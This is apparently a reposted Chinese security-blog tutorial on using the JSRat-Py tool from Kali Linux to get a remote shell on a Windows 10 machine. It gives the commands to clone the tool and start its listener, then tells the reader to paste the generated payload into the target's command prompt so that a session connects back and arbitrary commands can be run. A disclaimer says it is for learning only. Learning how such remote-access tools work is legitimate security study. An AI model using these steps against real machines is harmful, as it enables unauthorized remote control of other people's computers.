Linux_Kali

使用JSRAT远程管理win10系统

字号+ 作者:即刻安全 来源:转载 2016-12-16 11:11 我要评论( )

免责声明:本教程旨在帮助大家更好地理解和学习工具的使用。切勿非法使用!本站保留一切解释权!对于以此造成的一切法律问题及后果,本站概不负责! JSRAT是一个由Py......

免责声明:本教程旨在帮助大家更好地理解和学习工具的使用。切勿非法使用!本站保留一切解释权!对于以此造成的一切法律问题及后果,本站概不负责!

JSRAT是一个由Python编写的脚本,它可以实现对远程PC的shell管理。

首先我们在Kali上打开命令终端下载该脚本。输入命令:

git clone https://github.com/Hood3dRob1n/JSRat-Py.git

20160412154812

下载完成后我们首先进入 jsrat 的文件夹 。

cd JSRAT-Py

接着我们在该文件夹目录下执行如下命令:

./JSRAT.py  –i  192.168.0.140 –p 80

20160412155216

此时该服务已被我们正确打开并监听。我们将以上,客户端命令的URL地址拷贝到浏览器并打开。

20160412155428

接着我们在目标机器上将以上浏览器现实的代码复制到目标机器的CMD命令终端上,并回车执行该命令。

20160412155613

当成功在目标机器上执行该命令,很快我们可以再Kali的机器上弹回一个会话连接。

20160412155656

接下来就可以执行各种命令了。

原创翻译,转载请注明来自 即刻安全


本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/hack/Linux_Kali/424.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • Metasploit msfvenom 使用说明

    Metasploit msfvenom 使用说明

    2016-11-27 15:32

网友点评
暂时未开启评论功能~